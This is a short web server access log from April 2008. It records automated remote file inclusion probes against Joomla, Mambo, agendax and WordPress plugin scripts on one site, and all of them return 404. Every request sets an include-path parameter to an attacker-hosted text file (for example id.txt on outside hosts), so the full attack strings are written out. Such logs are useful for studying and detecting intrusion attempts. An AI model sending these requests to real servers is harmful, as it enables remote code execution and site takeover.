83.230.241.240 - - [20/Apr/2008:20:01:28 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.230.241.240 - - [20/Apr/2008:20:01:29 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.7.193.54 - - [20/Apr/2008:20:02:57 -0700] "GET /logs/components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
24.93.105.27 - - [20/Apr/2008:20:03:03 -0700] "GET /logs/access_070917.log//modules/agendax/addevent.inc.php?agendax_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
24.93.105.27 - - [20/Apr/2008:20:03:04 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
24.93.105.27 - - [20/Apr/2008:20:03:05 -0700] "GET /logs/access_071014.log//modules/agendax/addevent.inc.php?agendax_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.15.10.228 - - [20/Apr/2008:20:03:48 -0700] "GET /logs/access_080113.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
204.15.10.228 - - [20/Apr/2008:20:03:48 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
204.15.10.228 - - [20/Apr/2008:20:03:48 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.5.250.201 - - [20/Apr/2008:20:05:07 -0700] "GET /logs/access_070820.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.5.250.201 - - [20/Apr/2008:20:05:07 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.5.250.201 - - [20/Apr/2008:20:05:07 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.5.250.201 - - [20/Apr/2008:20:05:09 -0700] "GET /logs/access_071231.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
204.15.120.73 - - [20/Apr/2008:20:05:13 -0700] "GET /logs/access_070820.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.120.73 - - [20/Apr/2008:20:05:13 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.120.73 - - [20/Apr/2008:20:05:15 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.120.73 - - [20/Apr/2008:20:05:16 -0700] "GET /logs/access_071231.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
75.126.218.14 - - [20/Apr/2008:20:05:17 -0700] "GET /logs/access_070903.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org" 75.126.218.14